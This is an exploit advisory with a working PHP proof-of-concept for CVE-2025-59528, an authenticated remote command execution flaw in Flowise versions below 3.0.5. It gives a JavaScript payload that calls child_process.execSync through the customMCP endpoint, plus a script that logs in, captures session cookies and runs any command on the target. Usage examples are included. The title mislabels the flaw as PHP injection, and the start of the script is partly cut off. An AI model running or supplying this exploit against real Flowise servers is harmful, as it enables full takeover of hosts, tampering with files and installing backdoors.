============================================================================================================================================= | # Title : Flowise 3.0.4 php code injection | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://github.com/FlowiseAI/Flowise | ============================================================================================================================================= [+] Summary : FlowiseAI versions **below 3.0.5** contain a critical authentication‑bypass RCE vulnerability in the endpoint: /api/v1/node-load-method/customMCP After logging in with any valid account, an attacker can inject arbitrary JavaScript into the MCP handler, which is executed server‑side using NodeJS’s `child_process.execSync()`. This allows: - Full OS command execution - Full takeover of the host machine - Arbitrary file modification / deletion - Backdoor installation [+] References : ( https://packetstorm.news/files/id/211130/ & CVE-2025-59528 ) [+] Technical Details The exploit abuses the **customMCP load method**, which blindly evaluates supplied JavaScript: ```javascript ({x:(function(){ const cp = process.mainModule.require("child_process"); cp.execSync("COMMAND_HERE"); return 1; })()}) When posted to: POST /api/v1/node-load-method/customMCP Flowise executes the payload in the backend, giving full system control. 1. Save the file as: poc.php 2.Execute: php poc.php email@example.com "Password123" http://TARGET:3000 "id" [+] POC $email, "password" => $password ]); $opts = [ "http" => [ "header" => "Content-Type: application/json\r\n" . "x-request-from: internal\r\n", "method" => "POST", "content" => $data, "ignore_errors" => true ] ]; $context = stream_context_create($opts); $result = file_get_contents($endpoint, false, $context); $cookies = ""; foreach ($http_response_header as $header) { if (stripos($header, "Set-Cookie:") !== false) { $cookies .= trim(substr($header, 11)) . "; "; } } return $cookies; } function exploit($email, $password, $url, $cmd) { $cookies = login($email, $password, $url); if (!$cookies) { echo "[✖] Login failed.\n"; return; } $endpoint = rtrim($url, '/') . "/api/v1/node-load-method/customMCP"; $payload = '({x:(function(){const cp=process.mainModule.require("child_process");cp.execSync("'.$cmd.'");return 1;})()})'; $postData = json_encode([ "loadMethod" => "listActions", "inputs" => ["mcpServerConfig" => $payload] ]); $opts = [ "http" => [ "header" => "Content-Type: application/json\r\n" . "Cookie: $cookies\r\n", "method" => "POST", "content" => $postData, "ignore_errors" => true ] ]; $context = stream_context_create($opts); file_get_contents($endpoint, false, $context); echo "[✔] Command executed: $cmd\n"; } banner(); if ($argc < 5) { echo "Usage: php {$argv[0]} \n"; echo "Example:\n"; echo "php {$argv[0]} admin@test.com 'Pass@2025' http://localhost:3000 'id'\n"; exit; } $email = $argv[1]; $password = $argv[2]; $url = $argv[3]; $cmd = $argv[4]; exploit($email, $password, $url, $cmd); ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================